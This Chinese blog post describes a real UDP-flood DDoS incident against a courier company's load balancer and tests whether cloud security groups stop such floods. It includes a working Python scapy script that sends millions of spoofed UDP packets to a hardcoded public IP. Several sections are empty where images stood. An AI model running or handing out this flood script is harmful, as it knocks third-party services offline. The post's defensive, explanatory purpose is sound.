网络安全实验室运维监控网络与信息安全

DDoS 真实案例总结分析

2020-05-06  本文已影响0人  又增加了奇奇怪怪的知识

DDoS 真实案例总结分析

五一申请了值班,遇到国内某知名快递公司同城业务在凌晨三点左右,客户PV突发断流,用户截图只截图了一个PV断流的监控图来,然后其使用的外网型LB,域名解析正确,ping LB不通(LB未设置安全组不存在禁止ICMP协议),开始紧急排查。

排查思路:

最后问题原因出来了: 用户受到了DDoS UDP-Flood攻击。而且用户也收到了云平台推送的短信通知,但是他也不说,让我们可劲排查。

下次正确的排查思路:

由此产生到的两个问题。

安全组相应设置是否能够防御DDoS攻击?
为什么客户只开启了TCP80、443的端口为什么会受到UDP Flood攻击?

基于UDP Flood的攻击实践

实践相关说明
看python脚本,本次利用的是鼎鼎大名的scapy,用来网络编程是真的舒服。
#!/usr/bin/python3
from scapy.all import *
from scapy.layers.inet import IP, UDP


def src_ip():
    temp_ip = ''
    for i in range(0, 4):
        temp_ip = temp_ip + '.' + str(random.randrange(0,255))
    return temp_ip.strip('.')
ip = src_ip()
data = struct.pack('!17s', b"dffsadfsafsadfsdf")
for i in range(0,5000000):
    pkt = IP(src=ip, dst='139.155.75.204') / UDP(sport=random.randrange(1, 65536),
                                                 dport=random.randrange(1, 65536)) / data
    send(pkt, inter=0, count=1)
在服务器上面来进行抓包下来进行分析。(安全组设置默认全通的情况下)
# tcpdump -i eth0 -w udp.cap udp 
服务器.png 流量包.png 入站规则.png
可以得出结论:
再来看看设置了安全组关闭所有UDP端口看是否能够有效的阻止攻击。
拒绝安全组.png 云监控.png 停止后的云服务器监控.png
使用TCPDUMP抓包没有看到包了,但是还是在控制台监控上看到流量的入包情况。

最后的总结分析

timg.jpeg
上一篇 下一篇

猜你喜欢

热点阅读